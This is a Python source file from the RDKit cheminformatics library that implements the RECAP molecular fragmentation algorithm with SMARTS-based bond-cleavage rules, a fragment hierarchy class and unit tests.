# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Novartis Institutes for BioMedical Research Inc.
# nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
""" Implementation of the RECAP algorithm from Lewell et al. JCICS *38* 511-522 (1998)
The published algorithm is implemented more or less without
modification. The results are returned as a hierarchy of nodes instead
of just as a set of fragments. The hope is that this will allow a bit
more flexibility in working with the results.
For example:
>>> m = Chem.MolFromSmiles('C1CC1Oc1ccccc1-c1ncc(OC)cc1')
>>> res = Recap.RecapDecompose(m)
>>> res
<Chem.Recap.RecapHierarchyNode object at 0x00CDB5D0>
>>> res.children.keys()
['[*]C1CC1', '[*]c1ccccc1-c1ncc(OC)cc1', '[*]c1ccc(OC)cn1', '[*]c1ccccc1OC1CC1']
>>> res.GetAllChildren().keys()
['[*]c1ccccc1[*]', '[*]C1CC1', '[*]c1ccccc1-c1ncc(OC)cc1', '[*]c1ccc(OC)cn1', '[*]c1ccccc1OC1CC1']
To get the standard set of RECAP results, use GetLeaves():
>>> leaves=res.GetLeaves()
>>> leaves.keys()
['[*]c1ccccc1[*]', '[*]c1ccc(OC)cn1', '[*]C1CC1']
>>> leaf = leaves['[*]C1CC1']
>>> leaf.mol
<Chem.rdchem.Mol object at 0x00CBE0F0>
"""
import sys
import weakref
from rdkit import Chem
from rdkit.Chem import rdChemReactions as Reactions
from rdkit.six import iterkeys, iteritems, next
# These are the definitions that will be applied to fragment molecules:
reactionDefs = (
"[#7;+0;D2,D3:1]!@C(!@=O)!@[#7;+0;D2,D3:2]>>[*][#7:1].[#7:2][*]", # urea
"[C;!$(C([#7])[#7]):1](=!@[O:2])!@[#7;+0;!D1:3]>>[*][C:1]=[O:2].[*][#7:3]", # amide
"[C:1](=!@[O:2])!@[O;+0:3]>>[*][C:1]=[O:2].[O:3][*]", # ester
"[N;!D1;+0;!$(N-C=[#7,#8,#15,#16])](-!@[*:1])-!@[*:2]>>[*][*:1].[*:2][*]", # amines
#"[N;!D1](!@[*:1])!@[*:2]>>[*][*:1].[*:2][*]", # amines
# again: what about aromatics?
"[#7;R;D3;+0:1]-!@[*:2]>>[*][#7:1].[*:2][*]", # cyclic amines
"[#6:1]-!@[O;+0]-!@[#6:2]>>[#6:1][*].[*][#6:2]", # ether
"[C:1]=!@[C:2]>>[C:1][*].[*][C:2]", # olefin
"[n;+0:1]-!@[C:2]>>[n:1][*].[C:2][*]", # aromatic nitrogen - aliphatic carbon
"[O:3]=[C:4]-@[N;+0:1]-!@[C:2]>>[O:3]=[C:4]-[N:1][*].[C:2][*]", # lactam nitrogen - aliphatic carbon
"[c:1]-!@[c:2]>>[c:1][*].[*][c:2]", # aromatic carbon - aromatic carbon
"[n;+0:1]-!@[c:2]>>[n:1][*].[*][c:2]", # aromatic nitrogen - aromatic carbon *NOTE* this is not part of the standard recap set.
"[#7;+0;D2,D3:1]-!@[S:2](=[O:3])=[O:4]>>[#7:1][*].[*][S:2](=[O:3])=[O:4]", # sulphonamide
)
reactions = tuple([Reactions.ReactionFromSmarts(x) for x in reactionDefs])
class RecapHierarchyNode(object):
""" This class is used to hold the Recap hiearchy
"""
mol=None
children=None
parents=None
smiles = None
def __init__(self,mol):
self.mol=mol
self.children = {}
self.parents = {}
def GetAllChildren(self):
" returns a dictionary, keyed by SMILES, of children "
res = {}
for smi,child in iteritems(self.children):
res[smi] = child
child._gacRecurse(res,terminalOnly=False)
return res
def GetLeaves(self):
" returns a dictionary, keyed by SMILES, of leaf (terminal) nodes "
res = {}
for smi,child in iteritems(self.children):
if not len(child.children):
res[smi] = child
else:
child._gacRecurse(res,terminalOnly=True)
return res
def getUltimateParents(self):
""" returns all the nodes in the hierarchy tree that contain this
node as a child
"""
if not self.parents:
res = [self]
else:
res = []
for p in self.parents.values():
for uP in p.getUltimateParents():
if uP not in res:
res.append(uP)
return res
def _gacRecurse(self,res,terminalOnly=False):
for smi,child in iteritems(self.children):
if not terminalOnly or not len(child.children):
res[smi] = child
child._gacRecurse(res,terminalOnly=terminalOnly)
def __del__(self):
self.children={}
self.parent={}
self.mol=None
def RecapDecompose(mol,allNodes=None,minFragmentSize=0,onlyUseReactions=None):
""" returns the recap decomposition for a molecule """
mSmi = Chem.MolToSmiles(mol,1)
if allNodes is None:
allNodes={}
if mSmi in allNodes:
return allNodes[mSmi]
res = RecapHierarchyNode(mol)
res.smiles =mSmi
activePool={mSmi:res}
allNodes[mSmi]=res
while activePool:
nSmi = next(iterkeys(activePool))
node = activePool.pop(nSmi)
if not node.mol: continue
for rxnIdx,reaction in enumerate(reactions):
if onlyUseReactions and rxnIdx not in onlyUseReactions:
continue
#print ' .',nSmi
#print ' !!!!',rxnIdx,nSmi,reactionDefs[rxnIdx]
ps = reaction.RunReactants((node.mol,))
#print ' ',len(ps)
if ps:
for prodSeq in ps:
seqOk=True
# we want to disqualify small fragments, so sort the product sequence by size
# and then look for "forbidden" fragments
tSeq = [(prod.GetNumAtoms(onlyExplicit=True),idx) for idx,prod in enumerate(prodSeq)]
tSeq.sort()
ts=[(x,prodSeq[y]) for x,y in tSeq]
prodSeq=ts
for nats,prod in prodSeq:
try:
Chem.SanitizeMol(prod)
except:
continue
pSmi = Chem.MolToSmiles(prod,1)
if minFragmentSize>0:
nDummies = pSmi.count('*')
if nats-nDummies<minFragmentSize:
seqOk=False
break
# don't forget after replacing dummy atoms to remove any empty
# branches:
elif pSmi.replace('[*]','').replace('()','') in ('','C','CC','CCC'):
seqOk=False
break
prod.pSmi = pSmi
if seqOk:
for nats,prod in prodSeq:
pSmi = prod.pSmi
#print '\t',nats,pSmi
if not pSmi in allNodes:
pNode = RecapHierarchyNode(prod)
pNode.smiles=pSmi
pNode.parents[nSmi]=weakref.proxy(node)
node.children[pSmi]=pNode
activePool[pSmi] = pNode
allNodes[pSmi]=pNode
else:
pNode=allNodes[pSmi]
pNode.parents[nSmi]=weakref.proxy(node)
node.children[pSmi]=pNode
#print ' >>an:',allNodes.keys()
return res
# ------- ------- ------- ------- ------- ------- ------- -------
# Begin testing code
if __name__=='__main__':
import unittest
class TestCase(unittest.TestCase):
def test1(self):
m = Chem.MolFromSmiles('C1CC1Oc1ccccc1-c1ncc(OC)cc1')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.children.keys())==4)
self.assertTrue(len(res.GetAllChildren().keys())==5)
self.assertTrue(len(res.GetLeaves().keys())==3)
def test2(self):
m = Chem.MolFromSmiles('CCCOCCC')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(res.children=={})
def test3(self):
allNodes={}
m = Chem.MolFromSmiles('c1ccccc1-c1ncccc1')
res = RecapDecompose(m,allNodes=allNodes)
self.assertTrue(res)
self.assertTrue(len(res.children.keys())==2)
self.assertTrue(len(allNodes.keys())==3)
m = Chem.MolFromSmiles('COc1ccccc1-c1ncccc1')
res = RecapDecompose(m,allNodes=allNodes)
self.assertTrue(res)
self.assertTrue(len(res.children.keys())==2)
# we get two more nodes from that:
self.assertTrue(len(allNodes.keys())==5)
self.assertTrue('[*]c1ccccc1OC' in allNodes)
self.assertTrue('[*]c1ccccc1' in allNodes)
m = Chem.MolFromSmiles('C1CC1Oc1ccccc1-c1ncccc1')
res = RecapDecompose(m,allNodes=allNodes)
self.assertTrue(res)
self.assertTrue(len(res.children.keys())==4)
self.assertTrue(len(allNodes.keys())==10)
def testSFNetIssue1801871(self):
m = Chem.MolFromSmiles('c1ccccc1OC(Oc1ccccc1)Oc1ccccc1')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==2)
ks = res.GetLeaves().keys()
self.assertFalse('[*]C([*])[*]' in ks)
self.assertTrue('[*]c1ccccc1' in ks)
self.assertTrue('[*]C([*])Oc1ccccc1' in ks)
def testSFNetIssue1804418(self):
m = Chem.MolFromSmiles('C1CCCCN1CCCC')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==2)
ks = res.GetLeaves().keys()
self.assertTrue('[*]N1CCCCC1' in ks)
self.assertTrue('[*]CCCC' in ks)
def testMinFragmentSize(self):
m = Chem.MolFromSmiles('CCCOCCC')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(res.children=={})
res = RecapDecompose(m,minFragmentSize=3)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==1)
ks = res.GetLeaves().keys()
self.assertTrue('[*]CCC' in ks)
m = Chem.MolFromSmiles('CCCOCC')
res = RecapDecompose(m,minFragmentSize=3)
self.assertTrue(res)
self.assertTrue(res.children=={})
m = Chem.MolFromSmiles('CCCOCCOC')
res = RecapDecompose(m,minFragmentSize=2)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==2)
ks = res.GetLeaves().keys()
self.assertTrue('[*]CCC' in ks)
ks = res.GetLeaves().keys()
self.assertTrue('[*]CCOC' in ks)
def testAmideRxn(self):
m = Chem.MolFromSmiles('C1CC1C(=O)NC1OC1')
res = RecapDecompose(m,onlyUseReactions=[1])
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==2)
ks = res.GetLeaves().keys()
self.assertTrue('[*]C(=O)C1CC1' in ks)
self.assertTrue('[*]NC1CO1' in ks)
m = Chem.MolFromSmiles('C1CC1C(=O)N(C)C1OC1')
res = RecapDecompose(m,onlyUseReactions=[1])
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==2)
ks = res.GetLeaves().keys()
self.assertTrue('[*]C(=O)C1CC1' in ks)
self.assertTrue('[*]N(C)C1CO1' in ks)
m = Chem.MolFromSmiles('C1CC1C(=O)n1cccc1')
res = RecapDecompose(m,onlyUseReactions=[1])
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==2)
ks = res.GetLeaves().keys()
self.assertTrue('[*]C(=O)C1CC1' in ks)
self.assertTrue('[*]n1cccc1' in ks)
m = Chem.MolFromSmiles('C1CC1C(=O)CC1OC1')
res = RecapDecompose(m,onlyUseReactions=[1])
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==0)
m = Chem.MolFromSmiles('C1CCC(=O)NC1')
res = RecapDecompose(m,onlyUseReactions=[1])
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==0)
m = Chem.MolFromSmiles('CC(=O)NC')
res = RecapDecompose(m,onlyUseReactions=[1])
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==2)
ks = res.GetLeaves().keys()
m = Chem.MolFromSmiles('CC(=O)N')
res = RecapDecompose(m,onlyUseReactions=[1])
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==0)
m = Chem.MolFromSmiles('C(=O)NCCNC(=O)CC')
res = RecapDecompose(m,onlyUseReactions=[1])
self.assertTrue(res)
self.assertTrue(len(res.children)==4)
self.assertTrue(len(res.GetLeaves())==3)
def testEsterRxn(self):
m = Chem.MolFromSmiles('C1CC1C(=O)OC1OC1')
res = RecapDecompose(m,onlyUseReactions=[2])
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==2)
ks = res.GetLeaves().keys()
self.assertTrue('[*]C(=O)C1CC1' in ks)
self.assertTrue('[*]OC1CO1' in ks)
m = Chem.MolFromSmiles('C1CC1C(=O)CC1OC1')
res = RecapDecompose(m,onlyUseReactions=[2])
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==0)
m = Chem.MolFromSmiles('C1CCC(=O)OC1')
res = RecapDecompose(m,onlyUseReactions=[2])
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==0)
def testUreaRxn(self):
m = Chem.MolFromSmiles('C1CC1NC(=O)NC1OC1')
res = RecapDecompose(m,onlyUseReactions=[0])
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==2)
ks = res.GetLeaves().keys()
self.assertTrue('[*]NC1CC1' in ks)
self.assertTrue('[*]NC1CO1' in ks)
m = Chem.MolFromSmiles('C1CC1NC(=O)N(C)C1OC1')
res = RecapDecompose(m,onlyUseReactions=[0])
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==2)
ks = res.GetLeaves().keys()
self.assertTrue('[*]NC1CC1' in ks)
self.assertTrue('[*]N(C)C1CO1' in ks)
m = Chem.MolFromSmiles('C1CCNC(=O)NC1C')
res = RecapDecompose(m,onlyUseReactions=[0])
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==0)
m = Chem.MolFromSmiles('c1cccn1C(=O)NC1OC1')
res = RecapDecompose(m,onlyUseReactions=[0])
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==2)
ks = res.GetLeaves().keys()
self.assertTrue('[*]n1cccc1' in ks)
self.assertTrue('[*]NC1CO1' in ks)
m = Chem.MolFromSmiles('c1cccn1C(=O)n1c(C)ccc1')
res = RecapDecompose(m,onlyUseReactions=[0])
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==2)
ks = res.GetLeaves().keys()
self.assertTrue('[*]n1cccc1C' in ks)
def testAmineRxn(self):
m = Chem.MolFromSmiles('C1CC1N(C1NC1)C1OC1')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==3)
ks = res.GetLeaves().keys()
self.assertTrue('[*]C1CC1' in ks)
self.assertTrue('[*]C1CO1' in ks)
self.assertTrue('[*]C1CN1' in ks)
m = Chem.MolFromSmiles('c1ccccc1N(C1NC1)C1OC1')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==3)
ks = res.GetLeaves().keys()
self.assertTrue('[*]c1ccccc1' in ks)
self.assertTrue('[*]C1CO1' in ks)
self.assertTrue('[*]C1CN1' in ks)
m = Chem.MolFromSmiles('c1ccccc1N(c1ncccc1)C1OC1')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==3)
ks = res.GetLeaves().keys()
self.assertTrue('[*]c1ccccc1' in ks)
self.assertTrue('[*]c1ccccn1' in ks)
self.assertTrue('[*]C1CO1' in ks)
m = Chem.MolFromSmiles('c1ccccc1N(c1ncccc1)c1ccco1')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==3)
ks = res.GetLeaves().keys()
self.assertTrue('[*]c1ccccc1' in ks)
self.assertTrue('[*]c1ccccn1' in ks)
self.assertTrue('[*]c1ccco1' in ks)
m = Chem.MolFromSmiles('C1CCCCN1C1CC1')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==2)
ks = res.GetLeaves().keys()
self.assertTrue('[*]N1CCCCC1' in ks)
self.assertTrue('[*]C1CC1' in ks)
m = Chem.MolFromSmiles('C1CCC2N1CC2')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==0)
def testEtherRxn(self):
m = Chem.MolFromSmiles('C1CC1OC1OC1')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==2)
ks = res.GetLeaves().keys()
self.assertTrue('[*]C1CC1' in ks)
self.assertTrue('[*]C1CO1' in ks)
m = Chem.MolFromSmiles('C1CCCCO1')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==0)
m = Chem.MolFromSmiles('c1ccccc1OC1OC1')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==2)
ks = res.GetLeaves().keys()
self.assertTrue('[*]c1ccccc1' in ks)
self.assertTrue('[*]C1CO1' in ks)
m = Chem.MolFromSmiles('c1ccccc1Oc1ncccc1')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==2)
ks = res.GetLeaves().keys()
self.assertTrue('[*]c1ccccc1' in ks)
self.assertTrue('[*]c1ccccn1' in ks)
def testOlefinRxn(self):
m = Chem.MolFromSmiles('ClC=CBr')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==2)
ks = res.GetLeaves().keys()
self.assertTrue('[*]CCl' in ks)
self.assertTrue('[*]CBr' in ks)
m = Chem.MolFromSmiles('C1CC=CC1')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==0)
def testAromNAliphCRxn(self):
m = Chem.MolFromSmiles('c1cccn1CCCC')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==2)
ks = res.GetLeaves().keys()
self.assertTrue('[*]n1cccc1' in ks)
self.assertTrue('[*]CCCC' in ks)
m = Chem.MolFromSmiles('c1ccc2n1CCCC2')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==0)
def testLactamNAliphCRxn(self):
m = Chem.MolFromSmiles('C1CC(=O)N1CCCC')
res = RecapDecompose(m,onlyUseReactions=[8])
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==2)
ks = res.GetLeaves().keys()
self.assertTrue('[*]N1CCC1=O' in ks)
self.assertTrue('[*]CCCC' in ks)
m = Chem.MolFromSmiles('O=C1CC2N1CCCC2')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==0)
def testAromCAromCRxn(self):
m = Chem.MolFromSmiles('c1ccccc1c1ncccc1')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==2)
ks = res.GetLeaves().keys()
self.assertTrue('[*]c1ccccc1' in ks)
self.assertTrue('[*]c1ccccn1' in ks)
m = Chem.MolFromSmiles('c1ccccc1C1CC1')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==0)
def testAromNAromCRxn(self):
m = Chem.MolFromSmiles('c1cccn1c1ccccc1')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==2)
ks = res.GetLeaves().keys()
self.assertTrue('[*]n1cccc1' in ks)
self.assertTrue('[*]c1ccccc1' in ks)
def testSulfonamideRxn(self):
m = Chem.MolFromSmiles('CCCNS(=O)(=O)CC')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==2)
ks = res.GetLeaves().keys()
self.assertTrue('[*]NCCC' in ks)
self.assertTrue('[*]S(=O)(=O)CC' in ks)
m = Chem.MolFromSmiles('c1cccn1S(=O)(=O)CC')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==2)
ks = res.GetLeaves().keys()
self.assertTrue('[*]n1cccc1' in ks)
self.assertTrue('[*]S(=O)(=O)CC' in ks)
m = Chem.MolFromSmiles('C1CNS(=O)(=O)CC1')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==0)
def testSFNetIssue1881803(self):
m = Chem.MolFromSmiles('c1ccccc1n1cccc1')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==2)
m = Chem.MolFromSmiles('c1ccccc1[n+]1ccccc1')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==0)
m = Chem.MolFromSmiles('C1CC1NC(=O)CC')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==2)
m = Chem.MolFromSmiles('C1CC1[NH+]C(=O)CC')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==0)
m = Chem.MolFromSmiles('C1CC1NC(=O)NC1CCC1')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==2)
m = Chem.MolFromSmiles('C1CC1[NH+]C(=O)[NH+]C1CCC1')
res = RecapDecompose(m)
self.assertTrue(res)
self.assertTrue(len(res.GetLeaves())==0)
unittest.main()
|
soerendip42/rdkit
|
rdkit/Chem/Recap.py
|
Python
|
bsd-3-clause
| 21,394
|